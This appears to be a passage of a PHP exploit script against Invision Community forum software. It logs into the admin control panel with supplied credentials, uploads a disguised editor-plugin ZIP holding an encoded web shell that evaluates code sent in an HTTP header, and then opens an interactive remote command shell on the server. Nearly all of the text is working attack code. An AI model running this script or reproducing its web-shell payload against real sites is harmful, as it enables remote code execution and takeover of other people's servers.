\n\n"); $url = $argv[1]; $email = $argv[2]; $passwd = $argv[3]; $ch = curl_init(); @unlink('./cookies.txt'); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt'); print "[+] Logging into AdminCP\n"; curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=system&controller=login"); curl_setopt($ch, CURLOPT_POST, false); if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n"); curl_setopt($ch, CURLOPT_POSTFIELDS, "csrfKey={$csrf[1]}&auth=".urlencode($email)."&password={$passwd}&_processLogin=usernamepassword"); if (!preg_match("/303 See Other/i", curl_exec($ch))) die("[-] Login failed!\n"); print "[+] Uploading malicious ZIP file\n"; curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=editor&controller=toolbar&do=addPlugin"); curl_setopt($ch, CURLOPT_POST, false); if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n"); $plg = md5(time()).".zip"; @file_put_contents("rce.zip", base64_decode("UEsDBAoDAAAAADxvKFgecSjnMgAAADIAAAAJAAAAaW5kZXgucGhwPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VSVkVSWydIVFRQX0MnXSkpOyA/PgpQSwMECgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAAABwbHVnaW4uanNQSwECPwMKAwAAAAA8byhYHnEo5zIAAAAyAAAACQAkAAAAAAAAACCAtIEAAAAAaW5kZXgucGhwCgAgAAAAAAABABgAgMvlSzJC2gGAy+VLMkLaAYDL5UsyQtoBUEsBAj8DCgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAJAAAAAAAAAAggLSBWQAAAHBsdWdpbi5qcwoAIAAAAAAAAQAYAAC84E4yQtoBALzgTjJC2gEAvOBOMkLaAVBLBQYAAAAAAgACALYAAACAAAAAAAA=")); $params = ["csrfKey" => $csrf[1], "form_submitted" => 1, "editor_plugin_zip_noscript[]" => new CURLFile("rce.zip", "", $plg)]; curl_setopt($ch, CURLOPT_POSTFIELDS, $params); if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Upload failed!\n"); print "[+] Launching shell\n"; curl_setopt($ch, CURLOPT_URL, "{$url}applications/core/interface/ckeditor/ckeditor/plugins/{$plg}/"); curl_setopt($ch, CURLOPT_POST, false); $phpcode = "print '____'; passthru(base64_decode('%s')); print '____';"; while(1) { print "\ninvision-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode(sprintf($phpcode, base64_encode($cmd)))]); preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }